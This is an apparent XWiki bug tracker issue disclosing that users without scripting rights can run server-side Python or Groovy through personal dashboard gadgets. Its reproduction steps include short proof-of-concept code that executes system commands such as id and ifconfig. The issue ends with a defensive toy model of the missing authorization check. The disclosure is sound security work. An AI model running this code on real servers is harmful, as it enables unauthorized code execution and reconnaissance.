Details
Type: Bug
Status: Closed
Priority: Critical
Resolution: Duplicate
Affects Version/s: 7.2, 8.4.4, 11.10.2
Fix Version/s: None
Component/s: Dashboard
Development Priority: High
Difficulty: Unknown
Description
Registered users without scripting/programming permissions are able to execute python/groovy scripts while editing personal dashboards.
Steps to reproduce:
1) Create a new user on xwiki.org (or myxwiki.org).
2) Go to Profile -> Edit -> My dashboard -> Add gadget.
3) Choose either the python or the groovy gadget.
4) Paste the following python or groovy code (for a Unix-hosted XWiki):

Python gadget:
    import os
    print(os.popen("id").read())
    print(os.popen("hostname").read())
    print(os.popen("ifconfig").read())

Groovy gadget:
    r = Runtime.getRuntime()
    proc = r.exec('id');
    BufferedReader stdInput1 = new BufferedReader(new InputStreamReader(proc.getInputStream()));
    String s1 = null;
    while ((s1 = stdInput1.readLine()) != null) { print s1; }

5) Submit the gadget.
Expected behaviour:
- The user is unable to execute server-side code, because the account lacks scripting/programming permissions.
Current behaviour:
- The user can execute server-side code, as seen in the attached screenshots.
This issue affects all versions of XWiki that have the personal dashboard feature.
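The defensive point behind this report is that a script macro wrapped in a gadget must be authorized against the rights of the user who saved the gadget, never against the dashboard page or the user who happens to view it. The following is an added illustration of that decision, not XWiki's own code: the user model, the `Right` enum, the `check_gadget`/`render_dashboard` functions and the mapping of macro names to required rights (velocity needs SCRIPT, python and groovy need PROGRAMMING) are assumptions of this toy model, and the users and gadgets are constructed sample data.

```python
"""Toy model of the authorization check a dashboard gadget renderer should make.

Added illustration, not XWiki's own code. Assumptions of this model:
- a script macro runs only if the gadget's content author (the user who last
  saved it) holds the right that macro needs;
- velocity needs SCRIPT; python and groovy need PROGRAMMING;
- PROGRAMMING implies SCRIPT, not the other way round.
"""
from dataclasses import dataclass
from enum import Enum


class Right(Enum):
    VIEW = "view"
    EDIT = "edit"
    SCRIPT = "script"
    PROGRAMMING = "programming"


# Right each script macro needs before its body may run (model assumption).
MACRO_REQUIRED_RIGHT = {
    "velocity": Right.SCRIPT,
    "python": Right.PROGRAMMING,
    "groovy": Right.PROGRAMMING,
}


@dataclass(frozen=True)
class User:
    name: str
    rights: frozenset


@dataclass(frozen=True)
class Gadget:
    macro: str            # macro the gadget wraps, e.g. "python"
    body: str             # script source typed by the user (never executed here)
    content_author: User  # user who last saved the gadget


class GadgetRejected(Exception):
    """Raised when the gadget's author lacks the right its macro requires."""


def effective_rights(user: User) -> set:
    """Expand implied rights: PROGRAMMING grants SCRIPT as well."""
    rights = set(user.rights)
    if Right.PROGRAMMING in rights:
        rights.add(Right.SCRIPT)
    return rights


def check_gadget(gadget: Gadget, viewer: User) -> str:
    """Return the macro name if the gadget may execute, otherwise raise.

    `viewer` is accepted but deliberately ignored: a gadget saved by a
    low-privilege account must not gain rights just because an administrator
    opens the dashboard on which it sits.
    """
    required = MACRO_REQUIRED_RIGHT.get(gadget.macro)
    if required is None:
        return gadget.macro  # non-script gadget (static content): nothing to check
    if required not in effective_rights(gadget.content_author):
        raise GadgetRejected(
            f"{gadget.content_author.name} lacks {required.value} for {gadget.macro}"
        )
    return gadget.macro


def render_dashboard(gadgets, viewer: User):
    """Return (macro, status) pairs; rejected gadgets are skipped, not executed."""
    result = []
    for g in gadgets:
        try:
            check_gadget(g, viewer)
            result.append((g.macro, "executed"))
        except GadgetRejected:
            result.append((g.macro, "rejected"))
    return result


# Constructed sample data: a plain registered user and a programming-right admin.
REGISTERED = User("alice", frozenset({Right.VIEW, Right.EDIT}))
ADMIN = User("admin", frozenset({Right.VIEW, Right.EDIT, Right.PROGRAMMING}))

SAMPLE_GADGETS = [
    Gadget("python", "import os", REGISTERED),     # the report's scenario
    Gadget("velocity", "$xcontext.user", REGISTERED),
    Gadget("groovy", "println 'ok'", ADMIN),
    Gadget("html", "<p>hello</p>", REGISTERED),
]

if __name__ == "__main__":
    for macro, status in render_dashboard(SAMPLE_GADGETS, viewer=ADMIN):
        print(f"{macro:9} {status}")
```

Running the block shows the python and velocity gadgets saved by the registered user being rejected even when the administrator views the dashboard, while the admin's groovy gadget and the static html gadget pass; the behaviour reported above corresponds to the check being absent or tied to the wrong user.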
Issue Links
- duplicates: XWIKI-14247 User without scripting rights can execute velocity/python scripts through velocity/python gadgets in Dashboard WebHome and User Profile dashboard. (Closed)